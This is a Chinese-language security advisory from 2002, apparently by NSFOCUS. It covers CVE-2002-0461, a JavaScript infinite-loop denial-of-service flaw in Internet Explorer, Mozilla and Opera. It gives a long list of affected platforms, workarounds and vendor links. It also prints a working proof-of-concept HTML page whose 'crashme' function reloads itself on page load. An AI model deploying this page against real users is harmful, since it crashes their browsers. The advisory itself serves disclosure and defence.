首页 -> 安全研究
安全研究
安全漏洞
多家厂商JavaScript解释器拒绝服务攻击漏洞
发布日期:2002-03-19
更新日期:2002-03-25
受影响系统:
Microsoft Internet Explorer 5.0.1SP1描述:
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft Internet Explorer 5.0.1SP2
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft Internet Explorer 5.01
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
Microsoft Internet Explorer 5.5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft Internet Explorer 5.5SP1
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft Internet Explorer 5.5SP2
- Microsoft Windows Terminal Services
- Microsoft Windows Terminal Server 4.0
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows Enterprise Server 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Mozilla Browser 0.8
- Apple MacOS 9.2.1
- Apple MacOS 9.2
- Apple MacOS 9.1
- Apple MacOS 9.0.4
- Apple MacOS 9.0
- Apple MacOS 10.1.2
- Apple MacOS 10.1.1
- Apple MacOS 10.1
- Apple MacOS 10.0.4
- Apple MacOS 10.0.3
- Apple MacOS 10.0.2
- Apple MacOS 10.0.1
- Apple MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Mozilla Browser 0.9.2
- Apple MacOS 9.2.1
- Apple MacOS 9.2
- Apple MacOS 9.1
- Apple MacOS 9.0.4
- Apple MacOS 9.0
- Apple MacOS 10.1.2
- Apple MacOS 10.1.1
- Apple MacOS 10.1
- Apple MacOS 10.0.4
- Apple MacOS 10.0.3
- Apple MacOS 10.0.2
- Apple MacOS 10.0.1
- Apple MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Mozilla Browser 0.9.2.1
- Apple MacOS 9.2.1
- Apple MacOS 9.2
- Apple MacOS 9.1
- Apple MacOS 9.0.4
- Apple MacOS 9.0
- Apple MacOS 10.1.2
- Apple MacOS 10.1.1
- Apple MacOS 10.1
- Apple MacOS 10.0.4
- Apple MacOS 10.0.3
- Apple MacOS 10.0.2
- Apple MacOS 10.0.1
- Apple MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Mozilla Browser 0.9.3
- Apple MacOS 9.2.1
- Apple MacOS 9.2
- Apple MacOS 9.1
- Apple MacOS 9.0.4
- Apple MacOS 9.0
- Apple MacOS 10.1.2
- Apple MacOS 10.1.1
- Apple MacOS 10.1
- Apple MacOS 10.0.4
- Apple MacOS 10.0.3
- Apple MacOS 10.0.2
- Apple MacOS 10.0.1
- Apple MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Mozilla Browser 0.9.4
- Apple MacOS 9.2.1
- Apple MacOS 9.2
- Apple MacOS 9.1
- Apple MacOS 9.0.4
- Apple MacOS 9.0
- Apple MacOS 10.1.2
- Apple MacOS 10.1.1
- Apple MacOS 10.1
- Apple MacOS 10.0.4
- Apple MacOS 10.0.3
- Apple MacOS 10.0.2
- Apple MacOS 10.0.1
- Apple MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Mozilla Browser 0.9.4.1
- Apple MacOS 9.2.1
- Apple MacOS 9.2
- Apple MacOS 9.1
- Apple MacOS 9.0.4
- Apple MacOS 9.0
- Apple MacOS 10.1.2
- Apple MacOS 10.1.1
- Apple MacOS 10.1
- Apple MacOS 10.0.4
- Apple MacOS 10.0.3
- Apple MacOS 10.0.2
- Apple MacOS 10.0.1
- Apple MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Mozilla Browser 0.9.5
- Apple MacOS 9.2.1
- Apple MacOS 9.2
- Apple MacOS 9.1
- Apple MacOS 9.0.4
- Apple MacOS 9.0
- Apple MacOS 10.1.2
- Apple MacOS 10.1.1
- Apple MacOS 10.1
- Apple MacOS 10.0.4
- Apple MacOS 10.0.3
- Apple MacOS 10.0.2
- Apple MacOS 10.0.1
- Apple MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Mozilla Browser 0.9.6
- Apple MacOS 9.2.1
- Apple MacOS 9.2
- Apple MacOS 9.1
- Apple MacOS 9.0.4
- Apple MacOS 9.0
- Apple MacOS 10.1.2
- Apple MacOS 10.1.1
- Apple MacOS 10.1
- Apple MacOS 10.0.4
- Apple MacOS 10.0.3
- Apple MacOS 10.0.2
- Apple MacOS 10.0.1
- Apple MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Mozilla Browser 0.9.7
- Apple MacOS 9.2.1
- Apple MacOS 9.2
- Apple MacOS 9.1
- Apple MacOS 9.0.4
- Apple MacOS 9.0
- Apple MacOS 10.1.2
- Apple MacOS 10.1.1
- Apple MacOS 10.1
- Apple MacOS 10.0.4
- Apple MacOS 10.0.3
- Apple MacOS 10.0.2
- Apple MacOS 10.0.1
- Apple MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Mozilla Browser 0.9.8
- Apple MacOS 9.2.1
- Apple MacOS 9.2
- Apple MacOS 9.1
- Apple MacOS 9.0.4
- Apple MacOS 9.0
- Apple MacOS 10.1.2
- Apple MacOS 10.1.1
- Apple MacOS 10.1
- Apple MacOS 10.0.4
- Apple MacOS 10.0.3
- Apple MacOS 10.0.2
- Apple MacOS 10.0.1
- Apple MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Opera Software Opera Web Browser 5.02 win32
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
Opera Software Opera Web Browser 5.10 win32
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
Opera Software Opera Web Browser 5.11 win32
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
Opera Software Opera Web Browser 5.12 win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Opera Software Opera Web Browser 6.0.1win32
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
BUGTRAQ ID: 4322
CVE(CAN) ID: CVE-2002-0461
很多现代浏览器都对JavaScript提供支持,可以解释执行网页包含的JavaScript的代码。
多家厂商的浏览器程序对JavaScript的解释存在漏洞,远程攻击者可能利用这个问题对用户的浏览器实施拒绝服务攻击。
浏览器JavaScript解释上的漏洞可能使远程攻击者利用JavaScript使浏览器进入一个无限循环,导致其崩溃。已经证实存在此漏洞的浏览器包括IE、Mozilla、Opera。在某些环境下(如Windows 2000下的IE),从报告的错误信息看发生了缓冲区溢出,能否利用此溢出执行任意指令还未知。
<*来源:Patrik Birgersson (patrik.birgersson@aiasec.com)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-03/0235.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head>
<script language="JavaScript">
<!--
function crashme () {
var url = document.location
if (document.images) {
location.replace(url);
} else {
location.href = url;
}
crashme ()
}
-->
</script>
</head>
<body onLoad="crashme ()">
<center>
<h3>IE Javascript Crash Test</h3>
</center>
</body>
</html>
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在IE里禁止Javascript的运行:
在 工具->Internet选项->安全->Internet->自定义级别->Javascript脚本 设置禁用。
* 不要用有漏洞的浏览器访问不可信的站点。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp
Mozilla
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mozilla.org
Opera Software
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.opera.com
浏览次数:3739
严重程度:0(网友投票)
绿盟科技给您安全的保障